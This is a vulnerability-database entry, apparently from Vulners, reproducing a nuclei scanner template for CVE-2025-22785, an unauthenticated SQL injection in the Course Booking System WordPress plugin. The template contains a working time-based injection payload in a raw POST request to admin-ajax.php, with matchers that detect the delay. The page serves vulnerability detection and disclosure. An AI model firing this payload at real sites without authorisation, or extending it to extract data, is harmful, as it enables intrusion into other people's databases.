Lucene search
K

Course Booking System <= 6.0.6 - SQL Injection

🗓️ 06 Mar 2026 23:22:31Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Course Booking System WordPress plugin up to 6.0.6 is vulnerable to unauthenticated SQL Injection.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-22785
23 Jan 202510:21
githubexploit
Circl
CVE-2025-22785
15 Jan 202516:17
circl
CNNVD
WordPress plugin Course Booking System SQL注入漏洞
15 Jan 202500:00
cnnvd
CVE
CVE-2025-22785
15 Jan 202515:23
cve
Cvelist
CVE-2025-22785 WordPress Course Booking System plugin <= 6.0.6 - SQL Injection vulnerability
15 Jan 202515:23
cvelist
EUVD
EUVD-2025-2994
3 Oct 202520:07
euvd
NVD
CVE-2025-22785
15 Jan 202516:15
nvd
Patchstack
WordPress Course Booking System plugin <= 6.0.6 - SQL Injection vulnerability
13 Jan 202519:47
patchstack
Positive Technologies
PT-2025-4699
15 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2025-22785
6 Feb 202502:25
redhatcve
Rows per page
id: CVE-2025-22785

info:
  name: Course Booking System <= 6.0.6 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The Course Booking System plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 6.0.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-22785
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/course-booking-system/course-booking-system-605-unauthenticated-sql-injection
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wordpress,wp,wp-plugin,sqli,course-booking-system

http:
  - raw:
      - |
        @timeout: 30s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=cbs_action_booking_delete&booking_id=1&course_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(8)))sqltest)

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'len(body) == 0'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a00473045022100f8f2e43ac61373f282301eaf4fd70ec89330a1df8f6a56b6294ae434509424a40220689d325d482c7a1a4e86040e644713043ba21f0b9abc111ccc29b25c2fe51486:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Feb 2026 19:31Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.3
EPSS0.02847
SSVC
7